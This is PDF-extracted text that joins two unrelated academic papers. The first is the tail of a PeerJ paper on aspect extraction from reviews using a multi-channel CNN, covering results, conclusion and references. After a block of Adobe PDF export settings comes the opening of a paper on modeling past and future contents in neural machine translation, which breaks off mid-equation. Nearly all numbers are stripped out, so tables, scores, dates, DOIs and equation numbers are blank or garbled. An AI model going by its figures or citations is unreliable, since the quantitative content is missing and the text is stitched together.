. . – – wdemb . . . – rncrf+f . . – – cmla . – – – min . . . . bidtreecrf . . . . dtbcsnn . . de-cnn . – – . mcnn+wv+pos . . . . mcnn+wv +pos . . . . note: values in bold represent best results. da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the best results. this is likely due to the relatively smaller size of the semeval -r datasets. similarly, one can notice from the table , that in all the variants, the best results were recorded on the restaurant domain while relatively lower results are recorded on the laptop domain in all the datasets. this is likely due to the lower number of the aspects term contained in the restaurant domain than in the laptop review domain. as can be seen from table and fig. , all the variants of our model with the exception of mcnn-random demonstrate relatively competitive results with significant improvement across all the domains. this specifically indicates the weakness of the randomly initialized word embeddings for the aspect extraction. this is because mcnn-random is randomly initialized while the other variants are particularly initialized with pretrained word embeddings. this translates the importance of pretrained word embeddings over the randomly initialized word embeddings. the results also show that using domain-specific word embeddings for both laptop and restaurant domains perform better than the general word embeddings (google embeddings) initialization. this table comparison results of the different variants of our model in terms of recall, precision and f score (%) performance. variant semeval -l semeval -r semeval -r semeval -r r p f r p f r p f r p f mcnn+rand . . . . . . . . . . . . mcnn+wv . . . . . . . . . . . . mcnn+wv . . . . . . . . . . . . mcnn+wv+pos . . . . . . . . . . . . mcnn+wv +pos . . . . . . . . . . . . note: values in bold represent best results. . . . . . . . . . . . mcnn-ran mcnn-wv mcnn-wv mcnn-wv-pos mcnn-wv -pos sc o re ( % ) semeval -l semeval -r semeval -r semeval -r figure performance of our model variants in terms of f score accuracy. each point indicates an f score performance computed in percentage (%). full-size doi: . /peerj-cs. /fig- da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ supports the intuition that domain-specific embeddings typically contain opinion specific information related to a particular domain (laptop or restaurant) which helps to perform better than the general word embeddings which are merely trained on the google news corpus which is typically composed of textual reviews about the commonly discussed matters on the news. one can observe from fig. that in both laptop and restaurant domain the model suffers from low recall, meaning that it missed some vital aspect terms. however, using the pos tag which is an important linguistic feature help to overcome some drawbacks thereby improving the performance of the model. this specifically indicates the importance of using pos tags features in addition to pretrained word embeddings in aspect term extraction. we further conduct an experiment to assess the sensitivity of the model towards word embeddings dimensions. we specifically use different word embedding dimensions from to with the intervals of , i.e., { , , , , , , , , , , , , , }. the laptop domain uses embeddings trained on the amazon reviews and restaurant domain use the embeddings trained on the yelp reviews datasets. figure shows the experimental results on the mcnn-wv variant. the results indicate the highest performance at around dimensions and relatively remains stable above . this particularly implies the insensitivity of the model toward the dimension of word embeddings provided it is within the appropriate range such as – . it is clear that two key factors are basically the reasons behind the good performance of our model compared to the baseline methods: first, the pos tag embedding input layer which helps for better sequence labeling. the domain-specific pretrained word embeddings which were trained on the target domain corpus of the review datasets. the advantage of our approach is that it is relatively uncomplicated and automatic that . . . . . . . . . . . r p r p r p r p semeval -l semeval -r semeval -r semeval -r ) %( er ocs mcnn-ran mcnn-wv mcnn-wv mcnn-wv-pos mcnn-wv -pos figure performance of the different model variants in terms of recall and precision. each point shows precision and recall performance measured in percentage (%). full-size doi: . /peerj-cs. /fig- da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ does not require any feature engineering. this saves time, cost and improves the high performance of the model. conclusion in this research, we proposed an aspect extraction approach using deep mcnn leveraging two different channels namely, word embeddings and pos tag embeddings. we presented a series of experiments and the results on various datasets showed that our proposed approach outperformed the state-of-the-art methods. our results support the previous findings that showed that pretrained word vectors are always better than randomly initialized embeddings in deep learning based nlp tasks such as aspect extraction. it also reaffirms many of the previous findings which show that exploiting pos tag features improves the performance of nlp methods including aspect extraction. we also demonstrated the importance of using a domain specific word embedding over the general word embeddings. as a future direction of research, we think that applying an attention-based deep learning model for improving aspect extraction is worth exploring, and that integrating a lexicon in the word embedding layer in the mcnn is another direction of further exploration. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. sc o re ( % ) semeval -l semeval -r semeval -r semeval -r figure f score of the mcnn-wv -pos variant of our model on different word embedding dimensions. each point shows the f performance measured in percentage (%). full-size doi: . /peerj-cs. /fig- da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions � aminu da’u conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper. � naomie salim conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, proof reading. data availability the following information was supplied regarding data availability: the relevant datasets and the snippets codes are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references blumer a, ehrenfeucht a, haussler d, warmuth mk. . occam's razor. information processing letters ( ): – doi . / - ( ) - . cambria e. . affective computing and sentiment analysis. ieee intelligent systems ( ): – doi . /mis. . . chen z, mukherjee a, liu b. . aspect extraction with automated prior knowledge learning. in: nd annual meeting of the association for computational linguistics, acl – proceedings of the conference. vol. . copenhagen, – . chen p, sun z, bing l, yang w. . recurrent attention network on memory for aspect sentiment analysis. in: proceedings of the conference on empirical methods in natural language processing. baltimore, – . chernyshevich m. . ihs r&d belarus: cross-domain extraction of product features using conditional random fields. in: proceedings of the th international workshop on semantic evaluation (semeval ). dublin, – . dong f, zhang y, yang j. . attention-based recurrent convolutional neural network for automatic essay scoring. in: proceedings of the st conference on computational natural language learning (conll ). vancouver, – . hercig t, brychcín t, svoboda l, konkol m. . uwb at semeval- task : aspect based sentiment analysis. in: proceedings of semeval- . san diego, – . hu m, liu b. . mining and summarizing customer reviews. in: proceedings of the acm sigkdd international conference on knowledge discovery and data mining–kdd ' . new york: acm, – . irsoy o, cardie c. . opinion mining with deep recurrent neural networks. in: proceedings of the conference on empirical methods in natural language processing (emnlp). doha, – . jebbara s, cimiano p. . aspect-based relational sentiment analysis using a stacked neural network architecture. in: artificial intelligence, august. – doi . / - - - - - . jin w, ho hh. . a novel lexicalized hmm-based learning framework for web opinion mining. in: proceedings of the th annual international conference on machine learning– icml ' . new york: acm, – . da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /mis. . http://dx.doi.org/ . / - - - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kim y. . convolutional neural networks for sentence classification. in: proceedings of the emperical methods in natural language processing (emnlp). doha, new york: acm, – . lafferty j, mccallum a, pereira fcn. . conditional random fields: probabilistic models for segmenting and labeling sequence data. in: proceedings of the th international conference on machine learning (icml ). vol. . new york: acm, – . li x, lam w. . deep multi-task learning for aspect term extraction with memory interaction. in: proceedings of the conference on empirical methods in natural language processing. copenhagen, – . liu b. . sentiment analysis and opinion mining. first edition. san rafael: morgan & claypool publishers. luo h, li t, liu b, wang b, unger h. . improving aspect term extraction with bidirectional dependency tree representation. available at http://arxiv.org/abs/ . . maria p, dimitrios g, haris p, suresh m. . semeval- task : aspect based sentiment analysis. in: proceedings ofthe th international workshop on semantic evaluation (semeval ). denver, – . mcauley j, leskovec j. . hidden factors and hidden topics: understanding rating dimensions with review text. in: proceedings of the th acm conference on recommender systems. new york, – . mikolov t, yih w, zweig g. . linguistic regularities in continuous space word representations. in: proceedings of naacl-hlt . atlanta, – . pengfei l, shafiq j, helen m. . fine-grained opinion mining with recurrent neural networks and word embeddings. in: proceedings of the conference on empirical methods in natural language processing. lisbon, portugal, – . pontiki m, pavlopoulos j. . semeval- task : aspect based sentiment analysis. in: proceedings of the th international workshop on semantic evaluation. – doi . /ajcsit.v i . . popescu a, etzioni o. . extracting product features and opinion from reviews. in: proceedings of the conference on human language technology and empirical methods in natural language processing. british columbia: vancouver, – . poria s, cambria e, gelbukh a. . aspect extraction for opinion mining with a deep convolutional neural network. knowledge-based systems : – doi . /j.knosys. . . . qiu g, liu b, bu j, chen c. . opinion word expansion and target extraction through double propagation. computational linguistics ( ): – doi . /coli_a_ . toh z, su j. . nlangp at semeval- task : improving aspect based sentiment analysis using neural network features. in: proceedings of semeval- . vol. . san diego, – . toh z, wang w. . dlirec: aspect term extraction and term polarity classification system. in: proceedings of the th international workshop on semantic evaluation (semeval ). dublin, – . wang l, liu k, cao z, zhao j, de melo g. . sentiment-aspect extraction based on restricted boltzmann machines. in: proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers). beijing, – . wang w, pan sj, dahlmeier d. . multi-task memory networks for category-specific aspect and opinion terms co-extraction. in: association for the advancement of artificial intelligence. – . available at http://arxiv.org/abs/ . . da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://arxiv.org/abs/ . http://dx.doi.org/ . /ajcsit.v i . http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . /coli_a_ http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wang w, pan sj, dahlmeier d, xiao x. . recursive neural conditional random fields for aspect-based sentiment analysis. in: proceedings of the conference on empirical methods in natural language processing (emnlp- ), – . available at http://arxiv.org/abs/ . . wang b, wang h. . bootstrapping both product features and opinion words from chinese customer reviews with cross-inducing. in: ijcnlp, – . available at http://scholar.google. com/scholar?hl=en&btng=search&q=intitle:bootstrapping+both+product+features+and +opinion+words+from+chi-+nese+customer+reviews+with+cross-inducing+ # . xu l, lin j, wang l, yin c, wang j. . deep convolutional neural network based approach for aspect-based sentiment analysis. advanced science and technology letters : – doi . /astl. . . . xu h, liu b, shu l, yu ps. a. double embeddings and cnn-based sequence labeling for aspect extraction. in: proceedings of the th annual meeting of the association for computational linguistics. – . available at http://arxiv.org/abs/ . . xu h, liu b, shu l, yu ps. b. double embeddings and cnn-based sequence labeling for aspect extraction. in: proceedings of the th annual meeting of the association for computational linguistics, melbourne, – . ye h, yan z, luo z. . dependency-tree based convolutional neural networks for aspect term extraction. in: advances in knowledge discovery and data mining. pakdd . vol. . new york: springer, – . yin y, wei f, dong l, xu k, zhang m, zhou m. . unsupervised word and dependency path embeddings for aspect term extraction. in: ijcai international joint conference on artificial intelligence. vol. . new york: aaai press, – . da’u and salim ( ), peerj comput. sci., doi . /peerj-cs. / http://arxiv.org/abs/ . http://scholar.google.com/scholar?hl=en&btng=search&q=intitle:bootstrapping+both+product+features+and+opinion+words+from+chi-+nese+customer+reviews+with+cross-inducing+ # http://scholar.google.com/scholar?hl=en&btng=search&q=intitle:bootstrapping+both+product+features+and+opinion+words+from+chi-+nese+customer+reviews+with+cross-inducing+ # http://scholar.google.com/scholar?hl=en&btng=search&q=intitle:bootstrapping+both+product+features+and+opinion+words+from+chi-+nese+customer+reviews+with+cross-inducing+ # http://dx.doi.org/ . /astl. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ aspect extraction on user textual reviews using multi-channel convolutional neural network introduction related work our model model variations experimental study results and discussion conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice modeling past and future for neural machine translation zaixiang zheng∗ nanjing university zhengzx@nlp.nju.edu.cn hao zhou∗ toutiao ai lab zhouhao.nlp@bytedance.com shujian huang nanjing university huangsj@nlp.nju.edu.cn lili mou university of waterloo doublepower.mou@gmail.com xinyu dai nanjing university dxy@nlp.nju.edu.cn jiajun chen nanjing university chenjj@nlp.nju.edu.cn zhaopeng tu tencent ai lab zptu@tencent.com abstract existing neural machine translation systems do not explicitly model what has been trans- lated and what has not during the decoding phase. to address this problem, we propose a novel mechanism that separates the source information into two parts: translated past contents and untranslated future contents, which are modeled by two additional recur- rent layers. the past and future contents are fed to both the attention model and the de- coder states, which provides neural machine translation (nmt) systems with the knowl- edge of translated and untranslated contents. experimental results show that the proposed approach significantly improves the perfor- mance in chinese-english, german-english, and english-german translation tasks. specif- ically, the proposed model outperforms the conventional coverage model in terms of both the translation quality and the alignment error rate.† introduction neural machine translation (nmt) generally adopts an encoder-decoder framework (kalchbrenner and blunsom, ; cho et al., ; sutskever et al., ), where the encoder summarizes the source sentence into a source context vector, and the de- coder generates the target sentence word-by-word based on the given source. during translation, the decoder implicitly serves several functionalities at the same time: *equal contributions. †our code can be downloaded from https://github. com/zhengzx-nlp/past-and-future-nmt. . building a language model over the target sen- tence for translation fluency (lm). . acquiring the most relevant source-side in- formation to generate the current target word (present). . maintaining what parts in the source have been translated (past) and what parts have not (future). however, it may be difficult for a single recur- rent neural network (rnn) decoder to accomplish these functionalities simultaneously. a recent suc- cessful extension of nmt models is the attention mechanism (bahdanau et al., ; luong et al., ), which makes a soft selection over source words and yields an attentive vector to represent the most relevant source parts for the current decoding state. in this sense, the attention mechanism sepa- rates the present functionality from the decoder rnn, achieving significant performance improve- ment. in addition to present, we address the impor- tance of modeling past and future contents in machine translation. the past contents indicate translated information, whereas the future con- tents indicate untranslated information, both being crucial to nmt models, especially to avoid under- translation and over-translation (tu et al., ). ideally, past grows and future declines during the translation process. however, it may be difficult for a single rnn to explicitly model the above pro- cesses. in this paper, we propose a novel neural machine translation system that explicitly models past and future contents with two additional rnn layers. the rnn modeling the past contents (called past layer) starts from scratch and accumulates the in- transactions of the association for computational linguistics, vol. , pp. – , . action editor: philipp koehn. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. formation that is being translated at each decoding step (i.e., the present information yielded by at- tention). the rnn modeling the future contents (called future layer) begins with holistic source summarization, and subtracts the present infor- mation at each step. the two processes are guided by proposed auxiliary objectives. intuitively, the rnn state of the past layer corresponds to source contents that have been translated at a particular step, and the rnn state of the future layer cor- responds to source contents of untranslated words. at each decoding step, past and future together provide a full summarization of the source informa- tion. we then feed the past and future informa- tion to both the attention model and decoder states. in this way, our proposed mechanism not only pro- vides coverage information for the attention model, but also gives a holistic view of the source informa- tion at each time. we conducted experiments on chinese-english, german-english, and english-german benchmarks. experiments show that the proposed mechanism yields . , . , and . improvements of bleu scores in three tasks, respectively. in addition, it ob- tains an alignment error rate of . %, significantly lower than the baseline ( . %) and the coverage model ( . %) by tu et al. ( ). we observe that in traditional attention-based nmt, most errors occur due to over- and under-translation, which is probably because the decoder rnn fails to keep track of what has been translated and what has not. our model can alleviate such problems by explicitly modeling past and future contents. motivation in this section, we first introduce the standard attention-based nmt, and then motivate our model by several empirical findings. the attention mechanism, proposed in bahdanau et al. ( ), yields a dynamic source context vec- tor for the translation at a particular decoding step, modeling present information as described in sec- tion . this process is illustrated in figure . formally, let x = {x , . . . ,xi} be a given in- put sentence. the encoder rnn—generally imple- mented as a bi-directional rnn (schuster and pali- wal, )—transforms the sentence to a sequence ct hi hi hi hi h h xix encoder + αt, αt, i αt, i ss yt decoder in iti al iz e w ith so ur ce s um m ar iz at io n source vector for present translation xi figure : architecture of attention-based nmt. of annotations with hi = [−→ h i; ←− h i ] being the an- notation of xi. ( −→ h i and ←− h i refer to rnn’s hidden states in both directions.) based on the source annotations, another decoder rnn generates the translation by predicting a target word yt at each time step t: p(yt|y<t, x) = softmax(g(yt− , st, ct)), ( ) where g(·) is a non-linear activation, and st is the decoding state for time step t, computed by st = f(yt− , st− , ct). ( ) here f(·) is an rnn activation function, e.g., the gated recurrent unit (gru) (cho et al., ) and long short-term memory (lstm) (hochreiter and schmidhuber, ). ct is a vector summarizing relevant source information. it is computed as a weighted sum of the source annotations: ct = i∑ i= αt,i · hi, ( ) where the weights (αt,i for i = · · · ,i) are given by the attention mechanism: αt,i = softmax ( a(st− , hi) ) . ( ) here, a(·) is a scoring function, measuring the de- gree to which the decoding state and source infor- mation match to each other. src 与此同时,他呼吁提高民事服务效 率, 这也是鼓舞民心之举。 ref in the meanwhile he calls for bet- ter efficiency in civil service , which helps to promote people ’s trust . nmt at the same time , he called for a higher efficiency in civil service ef- ficiency . (a) translation example. we highlight under-translated words in bold and italicize over-translated words. initialize decoder states with . . . bleu source summarization . all-zero vector . (b) source summarization is not fully exploited by nmt decoder. table : evidence shows that attention-based nmt fails to make full use of source information, thus los- ing the holistic picture of source contents. intuitively, the attention-based decoder selects source annotations that are most relevant to the de- coder state, based on which the current target word is predicted. in other words, ct is some source infor- mation for the present translation. the decoder rnn is initialized with the sum- marization of the entire source sentence [−→ h i; ←− h ] , given by: s = tanh(ws [−→ h i; ←− h ] ). ( ) after we analyze existing attention-based nmt in detail, our intuition arises as follows. ideally, with the source summarization in mind, after generating each target word yt from the source contents ct, the decoder should keep track of ( ) translated source contents by accumulating ct, and ( ) untranslated source contents by subtracting ct from the source summarization. however, such information is not well learned in practice, as there lacks explicit mech- anisms to maintain translated and untranslated con- tents. evidence shows that attention-based nmt still suffers from serious over- and under-translation problems (tu et al., ; tu et al., b). exam- ples of under-translation are shown in table a. another piece of evidence also shows that the de- coder may lack a holistic view of the source infor- mation, as explained below. we conduct a pilot ex- periment by removing the initialization of the rnn decoder. if the “holistic” context is well exploited by the decoder, translation performance would signifi- cantly decrease without the initialization. as shown in table b, however, translation performance only decreases slightly after we remove the initialization. this indicates nmt decoders do not make full use of source summarization, that the initialization only helps the prediction at the beginning of the sentence. we attribute the vanishing of such signals to the overloaded use of decoder states (e.g., lm, past, and future functionalities), and hence we propose to explicitly model the holistic source summariza- tion by past and future contents at each decod- ing step. related work our research is built upon an attention-based sequence-to-sequence model (bahdanau et al., ), but is also related to coverage modeling, fu- ture modeling, and functionality separation. we dis- cuss these topics in the following. coverage modeling. tu et al. ( ) and mi et al. ( ) maintain a coverage vector to indicate which source words have been translated and which source words have not. these vectors are updated by ac- cumulating attention probabilities at each decoding step, which provides an opportunity for the attention model to distinguish translated source words from untranslated ones. viewing coverage vectors as a (soft) indicator of translated source contents, follow- ing this idea, we take one step further. we model translated and untranslated source contents by di- rectly manipulating the attention vector (i.e., the source contents that are being translated) instead of attention probability (i.e., the probability of a source word being translated). in addition, we explicitly model both translated (with past-rnn) and untranslated (with future- rnn) instead of using a single coverage vector to indicate translated source words. the difference with tu et al. ( ) is that the past and future contents in our model are fed not only to the attention mechanism but also the decoder’s states. in the context of semantic-level coverage, wang et al. ( ) propose a memory-enhanced decoder sts past layer s ctc st p attention (present) layer decoder layer future layersts fs f f s p source summarization st- p figure : nmt decoder augmented with past and future layers. and meng et al. ( ) propose a memory-enhanced attention model. both implement the memory with a neural turing machine (graves et al., ), in which the reading and writing operations are ex- pected to erase translated contents and highlight un- translated contents. however, their models lack an explicit objective to guide such intuition, which is one of the key ingredients for the success in this work. in addition, we use two separate layers to ex- plicitly model translated and untranslated contents, which is another distinguishing feature of the pro- posed approach. future modeling. standard neural sequence de- coders generate target sentences from left to right, thus failing to estimate some desired properties in the future (e.g., the length of target sentence). to address this problem, actor-critic algorithms are em- ployed to predict future properties (li et al., ; bahdanau et al., ), in their models, an interpola- tion of the actor (the standard generation policy) and the critic (a value function that estimates the future values) is used for decision making. concerning the future generation at each decoding step, weng et al. ( ) guide the decoder’s hidden states to not only generate the current target word, but also predict the target words that remain untranslated. along the di- rection of future modeling, we introduce a future layer to maintain the untranslated source contents, which is updated at each decoding step by subtract- ing the source content being translated (i.e., atten- tion vector) from the last state (i.e., the untranslated source content so far). functionality separation. recent work has re- vealed that the overloaded use of representations makes model training difficult, and such problems can be alleviated by explicitly separating these func- tions (reed and freitas, ; ba et al., ; miller et al., ; gulcehre et al., ; rocktäschel et al., ). for example, miller et al. ( ) sep- arate the functionality of look-up keys and mem- ory contents in memory networks (sukhbaatar et al., ). rocktäschel et al. ( ) propose a key- value-predict attention model, which outputs three vectors at each step: the first is used to predict the next-word distribution; the second serves as the key for decoding; and the third is used for the attention mechanism. in this work, we further separate past and future functionalities from the decoder’s hid- den representations. modeling past and future for neural machine translation in this section, we describe how to separate past and future functions from decoding states. we introduce two additional rnn layers (figure ): • future layer (section . ) encodes source contents to be translated. • past layer (section . ) encodes translated source contents. let us take y = {y ,y ,y ,y } as an example of the target sentence. the initial state of the future layer is a summarization of the whole source sen- tence, indicating that all source contents need to be translated. the initial state of the past layer is an all-zero vector, indicating no source content is yet neural network layer ✕ element-wise multiplication + element-wise addition st- st rt ✕ + ut ! - ✕ ! tanh ✕ st~ ct f f f (a) gru projected minus — neural network layer ✕ element-wise multiplication + element-wise addition st- st rt ✕ ct + ut ! - ✕ ! tanh ✕ st~ — tanh f f f (b) gru-o projected minus — neural network layer ✕ element-wise multiplication + element-wise addition st- st rt ct + ut ! - ✕ ! tanh ✕ st~ —✕ f f f (c) gru-i figure : variants of activation functions for the future layer. translated. after c is obtained by the attention mechanism, we ( ) update the future layer by “subtracting” c from the previous state, and ( ) update the past layer state by “adding” c to the previous state. the two rnn states are updated as described above at every step of generating y , y , y , and y . in this way, at each time step, the future layer encodes source contents to be translated in the future steps, while the past layer encodes translated source con- tents up to the current step. the advantages of the past and the future lay- ers are two-fold. first, they provide coverage in- formation, which is fed to the attention model and guides nmt systems to pay more attention to un- translated source contents. second, they provide a holistic view of the source information, since we would anticipate “past + future = holistic.” we describe them in detail in the rest of this section. . modeling future formally, the future layer is a recurrent neural network (the first gray layer in figure ) , and its state at time step t is computed by sft = f(s f t− , ct), ( ) where f is the activation function for the future layer. we have several variants of f, aiming to bet- ter model the expected subtraction, as described in section . . . the future rnn is initialized with the summarization of the whole source sentence, as computed by equation . when calculating attention context at time step t, we feed the attention model with the future state from the last time step, which encodes source con- tents to be translated. we rewrite equation as αt,i = softmax ( a(st− , hi, s f t− ) ) . ( ) after obtaining attention context ct, we update future states via equation , and feed both of them to decoder states: st = f(st− ,yt− , ct, s f t ), ( ) where ct encodes the source context of the present translation, and sft encodes the source context on the future translation. . . activation functions for subtraction we design several variants of rnn activation functions to better model the subtractive operation (figure ): gru. a natural choice is the standard gru , which learns subtraction directly from the data: sft = gru(s f t− , ct) ( ) = ut · sft− + ( − ut) · s̃ft ; s̃ft = tanh(u(rt · sft− ) + wct); ( ) rt = σ(urs f t− + wrct); ( ) ut = σ(uus f t− + wuct), ( ) where rt is a reset gate determining the combination of the input with the previous state, and ut is an up- date gate defining how much of the previous state to keep around. the standard gru uses a feed-forward our work focuses on gru, but can be applied to any rnn architectures such as lstm. neural network (equation ) to model the subtrac- tion without any explicit operation, which may lead to the difficulty of the training. in the following two variants, we provide gru with explicit subtraction operations, which are in- spired by the well known phenomenon that minus operation can be applied to the semantics of word embeddings (mikolov et al., ). therefore we subtract the semantics being translated from the un- translated future contents at each decoding step. gru with outside minus (gru-o). instead of directly feeding ct to gru, we compute the current untranslated contents m(sft− , ct) with an explicit minus operation, and then feed it to gru: sft = gru(s f t− , m(s f t− , ct)); ( ) m(sft− , ct) = tanh(ums f t− −wmct). ( ) gru with inside minus (gru-i). we can alter- natively integrate a minus operation into the calcu- lation of s̃ft : s̃ft = tanh(us f t− −w(rt · ct)). ( ) compared with equation , the differences be- tween gru-i and standard gru are: . minus operation is applied to produce the en- ergy of the intermediate candidate state s̃ft ; . the reset gate rt is used to control the amount of information flowing from inputs instead of from the previous state sft− . note that for both gru-o and gru-i, we leave enough freedom for gru to decide the extent of integrating with subtraction operations. in other words, the information subtraction is “soft.” . modeling past formally, the past layer is another recurrent neural network (the second gray layer in figure ), and its state at time step t is calculated by: spt = gru(s p t− , ct). ( ) initially, spt is an all-zero vector, which denotes no source content is yet translated. we choose gru as the activation function for the past layer, since e(“king”) − e(“man”) = e(“queen”) − e(“woman”), where e(·) is the embedding of a word. the internal structure of gru is in accord with the “addition” operation. we feed the past state from last time step to both attention model and decoder state: αt,i = softmax ( a(st− , hi, s p t− ) ) ; ( ) st = f(st− ,yt− , ct, s p t− ). ( ) . modeling past and future we integrate past and future layers together in our final model (figure ): αt,i = softmax ( a(st− , hi, s f t− , s p t− ) ) ; ( ) st = f(st− ,yt− , ct, s f t− , s p 